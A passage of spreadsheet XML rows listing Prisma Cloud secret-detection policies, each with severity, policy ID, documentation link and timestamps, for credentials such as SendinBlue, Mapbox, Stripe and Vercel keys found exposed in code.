      <c r="AA601" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB601" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC601" t="inlineStr">
        <is>
          <t>CKV_SECRET_96</t>
        </is>
      </c>
      <c r="AD601" t="b">
        <v>1</v>
      </c>
      <c r="AE601" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF601" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>473b2317-65ab-4036-8eb0-b6de2b28b14b</t>
        </is>
      </c>
      <c r="AI601" t="inlineStr"/>
      <c r="AJ601" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK601" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" t="inlineStr"/>
      <c r="B602" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C602" s="2" t="inlineStr"/>
      <c r="D602" t="inlineStr"/>
      <c r="E602" t="inlineStr"/>
      <c r="F602" t="inlineStr"/>
      <c r="G602" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J602" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K602" t="inlineStr">
        <is>
          <t>SendinBlue Key detected in code</t>
        </is>
      </c>
      <c r="L602" t="inlineStr"/>
      <c r="M602" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N602" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O602" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P602" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q602" t="inlineStr"/>
      <c r="R602" t="inlineStr"/>
      <c r="S602" t="inlineStr"/>
      <c r="T602" t="b">
        <v>0</v>
      </c>
      <c r="U602" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V602" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W602" t="inlineStr">
        <is>
          <t>SendinBlue Key</t>
        </is>
      </c>
      <c r="X602" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-95</t>
        </is>
      </c>
      <c r="Y602" t="inlineStr"/>
      <c r="Z602" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA602" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB602" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC602" t="inlineStr">
        <is>
          <t>CKV_SECRET_95</t>
        </is>
      </c>
      <c r="AD602" t="b">
        <v>1</v>
      </c>
      <c r="AE602" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF602" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>5b54108f-8a62-49aa-8f87-bd5580f35333</t>
        </is>
      </c>
      <c r="AI602" t="inlineStr"/>
      <c r="AJ602" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK602" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" t="inlineStr"/>
      <c r="B603" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C603" s="2" t="inlineStr"/>
      <c r="D603" t="inlineStr"/>
      <c r="E603" t="inlineStr"/>
      <c r="F603" t="inlineStr"/>
      <c r="G603" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J603" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K603" t="inlineStr">
        <is>
          <t>Mapbox Token detected in code</t>
        </is>
      </c>
      <c r="L603" t="inlineStr"/>
      <c r="M603" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N603" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O603" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P603" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q603" t="inlineStr"/>
      <c r="R603" t="inlineStr"/>
      <c r="S603" t="inlineStr"/>
      <c r="T603" t="b">
        <v>0</v>
      </c>
      <c r="U603" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V603" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W603" t="inlineStr">
        <is>
          <t>Mapbox Token</t>
        </is>
      </c>
      <c r="X603" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-91</t>
        </is>
      </c>
      <c r="Y603" t="inlineStr"/>
      <c r="Z603" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA603" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB603" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC603" t="inlineStr">
        <is>
          <t>CKV_SECRET_91</t>
        </is>
      </c>
      <c r="AD603" t="b">
        <v>1</v>
      </c>
      <c r="AE603" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF603" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>80430283-a701-496d-ba3d-9558b88568cd</t>
        </is>
      </c>
      <c r="AI603" t="inlineStr"/>
      <c r="AJ603" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK603" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" t="inlineStr"/>
      <c r="B604" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C604" s="2" t="inlineStr"/>
      <c r="D604" t="inlineStr"/>
      <c r="E604" t="inlineStr"/>
      <c r="F604" t="inlineStr"/>
      <c r="G604" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J604" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K604" t="inlineStr">
        <is>
          <t>Mailgun Primary Account API key detected in code</t>
        </is>
      </c>
      <c r="L604" t="inlineStr"/>
      <c r="M604" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N604" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O604" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P604" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q604" t="inlineStr"/>
      <c r="R604" t="inlineStr"/>
      <c r="S604" t="inlineStr"/>
      <c r="T604" t="b">
        <v>0</v>
      </c>
      <c r="U604" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V604" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W604" t="inlineStr">
        <is>
          <t>Mailgun Primary Account API key</t>
        </is>
      </c>
      <c r="X604" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-94</t>
        </is>
      </c>
      <c r="Y604" t="inlineStr"/>
      <c r="Z604" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA604" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB604" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC604" t="inlineStr">
        <is>
          <t>CKV_SECRET_94</t>
        </is>
      </c>
      <c r="AD604" t="b">
        <v>1</v>
      </c>
      <c r="AE604" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF604" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>f773640c-442e-4f1d-9893-35775230b66f</t>
        </is>
      </c>
      <c r="AI604" t="inlineStr"/>
      <c r="AJ604" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK604" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" t="inlineStr"/>
      <c r="B605" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C605" s="2" t="inlineStr"/>
      <c r="D605" t="inlineStr"/>
      <c r="E605" t="inlineStr"/>
      <c r="F605" t="inlineStr"/>
      <c r="G605" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J605" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K605" t="inlineStr">
        <is>
          <t>Stripe Webhook Secret detected in code</t>
        </is>
      </c>
      <c r="L605" t="inlineStr"/>
      <c r="M605" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N605" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O605" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P605" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q605" t="inlineStr"/>
      <c r="R605" t="inlineStr"/>
      <c r="S605" t="inlineStr"/>
      <c r="T605" t="b">
        <v>0</v>
      </c>
      <c r="U605" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V605" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W605" t="inlineStr">
        <is>
          <t>Stripe Webhook Secret</t>
        </is>
      </c>
      <c r="X605" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-166</t>
        </is>
      </c>
      <c r="Y605" t="inlineStr"/>
      <c r="Z605" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA605" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB605" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC605" t="inlineStr">
        <is>
          <t>CKV_SECRET_166</t>
        </is>
      </c>
      <c r="AD605" t="b">
        <v>1</v>
      </c>
      <c r="AE605" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF605" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>fb304564-54a4-4d0b-b97d-544b4b6bb120</t>
        </is>
      </c>
      <c r="AI605" t="inlineStr"/>
      <c r="AJ605" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK605" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" t="inlineStr"/>
      <c r="B606" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C606" s="2" t="inlineStr"/>
      <c r="D606" t="inlineStr"/>
      <c r="E606" t="inlineStr"/>
      <c r="F606" t="inlineStr"/>
      <c r="G606" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J606" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K606" t="inlineStr">
        <is>
          <t>Pulumi Access Token detected in code</t>
        </is>
      </c>
      <c r="L606" t="inlineStr"/>
      <c r="M606" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N606" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O606" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P606" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q606" t="inlineStr"/>
      <c r="R606" t="inlineStr"/>
      <c r="S606" t="inlineStr"/>
      <c r="T606" t="b">
        <v>0</v>
      </c>
      <c r="U606" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V606" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W606" t="inlineStr">
        <is>
          <t>Pulumi Access Token</t>
        </is>
      </c>
      <c r="X606" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-60</t>
        </is>
      </c>
      <c r="Y606" t="inlineStr"/>
      <c r="Z606" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA606" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB606" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC606" t="inlineStr">
        <is>
          <t>CKV_SECRET_60</t>
        </is>
      </c>
      <c r="AD606" t="b">
        <v>1</v>
      </c>
      <c r="AE606" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF606" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>b2ec65ce-9bc0-463e-b8e2-92d38423183a</t>
        </is>
      </c>
      <c r="AI606" t="inlineStr"/>
      <c r="AJ606" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK606" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" t="inlineStr"/>
      <c r="B607" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C607" s="2" t="inlineStr"/>
      <c r="D607" t="inlineStr"/>
      <c r="E607" t="inlineStr"/>
      <c r="F607" t="inlineStr"/>
      <c r="G607" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J607" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K607" t="inlineStr">
        <is>
          <t>PlanetScale Token detected in code</t>
        </is>
      </c>
      <c r="L607" t="inlineStr"/>
      <c r="M607" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N607" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O607" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P607" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q607" t="inlineStr"/>
      <c r="R607" t="inlineStr"/>
      <c r="S607" t="inlineStr"/>
      <c r="T607" t="b">
        <v>0</v>
      </c>
      <c r="U607" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V607" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W607" t="inlineStr">
        <is>
          <t>PlanetScale Token</t>
        </is>
      </c>
      <c r="X607" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-58</t>
        </is>
      </c>
      <c r="Y607" t="inlineStr"/>
      <c r="Z607" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA607" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB607" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC607" t="inlineStr">
        <is>
          <t>CKV_SECRET_58</t>
        </is>
      </c>
      <c r="AD607" t="b">
        <v>1</v>
      </c>
      <c r="AE607" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF607" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>d671864e-5c7b-423b-bfe2-2ede45e8d18a</t>
        </is>
      </c>
      <c r="AI607" t="inlineStr"/>
      <c r="AJ607" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK607" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" t="inlineStr"/>
      <c r="B608" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C608" s="2" t="inlineStr"/>
      <c r="D608" t="inlineStr"/>
      <c r="E608" t="inlineStr"/>
      <c r="F608" t="inlineStr"/>
      <c r="G608" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J608" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K608" t="inlineStr">
        <is>
          <t>Samsara API Key detected in code</t>
        </is>
      </c>
      <c r="L608" t="inlineStr"/>
      <c r="M608" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N608" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O608" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P608" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q608" t="inlineStr"/>
      <c r="R608" t="inlineStr"/>
      <c r="S608" t="inlineStr"/>
      <c r="T608" t="b">
        <v>0</v>
      </c>
      <c r="U608" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V608" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W608" t="inlineStr">
        <is>
          <t>Samsara API Key</t>
        </is>
      </c>
      <c r="X608" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-108</t>
        </is>
      </c>
      <c r="Y608" t="inlineStr"/>
      <c r="Z608" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA608" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB608" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC608" t="inlineStr">
        <is>
          <t>CKV_SECRET_108</t>
        </is>
      </c>
      <c r="AD608" t="b">
        <v>1</v>
      </c>
      <c r="AE608" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF608" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>52592e11-1343-44a4-a8d7-224fe826aa63</t>
        </is>
      </c>
      <c r="AI608" t="inlineStr"/>
      <c r="AJ608" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK608" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" t="inlineStr"/>
      <c r="B609" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C609" s="2" t="inlineStr"/>
      <c r="D609" t="inlineStr"/>
      <c r="E609" t="inlineStr"/>
      <c r="F609" t="inlineStr"/>
      <c r="G609" t="b">
        <v>1</v>
      </c>
      <c r="H6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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J609" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K609" t="inlineStr">
        <is>
          <t>Square Application Secret detected in code</t>
        </is>
      </c>
      <c r="L609" t="inlineStr"/>
      <c r="M609" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N609" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O609" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P609" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q609" t="inlineStr"/>
      <c r="R609" t="inlineStr"/>
      <c r="S609" t="inlineStr"/>
      <c r="T609" t="b">
        <v>0</v>
      </c>
      <c r="U609" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V609" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W609" t="inlineStr">
        <is>
          <t>Square Application Secret</t>
        </is>
      </c>
      <c r="X609" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-102</t>
        </is>
      </c>
      <c r="Y609" t="inlineStr"/>
      <c r="Z609" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA609" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB609" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC609" t="inlineStr">
        <is>
          <t>CKV_SECRET_102</t>
        </is>
      </c>
      <c r="AD609" t="b">
        <v>1</v>
      </c>
      <c r="AE609" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF609" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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09" t="inlineStr">
        <is>
          <t>25388823-a2d4-4907-b913-fb8a33213faf</t>
        </is>
      </c>
      <c r="AI609" t="inlineStr"/>
      <c r="AJ609" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK609" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" t="inlineStr"/>
      <c r="B610" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C610" s="2" t="inlineStr"/>
      <c r="D610" t="inlineStr"/>
      <c r="E610" t="inlineStr"/>
      <c r="F610" t="inlineStr"/>
      <c r="G610" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J610" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K610" t="inlineStr">
        <is>
          <t>Cloudant Credential detected in code</t>
        </is>
      </c>
      <c r="L610" t="inlineStr"/>
      <c r="M610" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N610" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O610" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P610" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q610" t="inlineStr"/>
      <c r="R610" t="inlineStr"/>
      <c r="S610" t="inlineStr"/>
      <c r="T610" t="b">
        <v>0</v>
      </c>
      <c r="U610" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V610" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W610" t="inlineStr">
        <is>
          <t>Cloudant Credentials</t>
        </is>
      </c>
      <c r="X610" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-5</t>
        </is>
      </c>
      <c r="Y610" t="inlineStr"/>
      <c r="Z610" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA610" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB610" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC610" t="inlineStr">
        <is>
          <t>CKV_SECRET_5</t>
        </is>
      </c>
      <c r="AD610" t="b">
        <v>1</v>
      </c>
      <c r="AE610" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF610" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>0a69df21-a2a9-4b25-ae3b-1074d1e5e812</t>
        </is>
      </c>
      <c r="AI610" t="inlineStr"/>
      <c r="AJ610" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK610" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" t="inlineStr"/>
      <c r="B611" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C611" s="2" t="inlineStr"/>
      <c r="D611" t="inlineStr"/>
      <c r="E611" t="inlineStr"/>
      <c r="F611" t="inlineStr"/>
      <c r="G611" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J611" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K611" t="inlineStr">
        <is>
          <t>Vercel API Token detected in code</t>
        </is>
      </c>
      <c r="L611" t="inlineStr"/>
      <c r="M611" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N611" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O611" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P611" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q611" t="inlineStr"/>
      <c r="R611" t="inlineStr"/>
      <c r="S611" t="inlineStr"/>
      <c r="T611" t="b">
        <v>0</v>
      </c>
      <c r="U611" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V611" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W611" t="inlineStr">
        <is>
          <t>Vercel API Token</t>
        </is>
      </c>
      <c r="X611" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-74</t>
        </is>
      </c>
      <c r="Y611" t="inlineStr"/>
      <c r="Z611" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA611" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB611" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC611" t="inlineStr">
        <is>
          <t>CKV_SECRET_74</t>
        </is>
      </c>
      <c r="AD611" t="b">
        <v>1</v>
      </c>
      <c r="AE611" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF611" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>0e6cee83-8605-44a0-b53e-8410872d0cea</t>
        </is>
      </c>
      <c r="AI611" t="inlineStr"/>
      <c r="AJ611" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK611" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" t="inlineStr"/>
      <c r="B612" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C612" s="2" t="inlineStr"/>
      <c r="D612" t="inlineStr"/>
      <c r="E612" t="inlineStr"/>
      <c r="F612" t="inlineStr"/>
      <c r="G612" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J612" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K612" t="inlineStr">
        <is>
          <t>Postman API Key detected in code</t>
        </is>
      </c>
      <c r="L612" t="inlineStr"/>
      <c r="M612" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N612" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O612" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P612" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q612" t="inlineStr"/>
      <c r="R612" t="inlineStr"/>
      <c r="S612" t="inlineStr"/>
      <c r="T612" t="b">
        <v>0</v>
      </c>
      <c r="U612" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
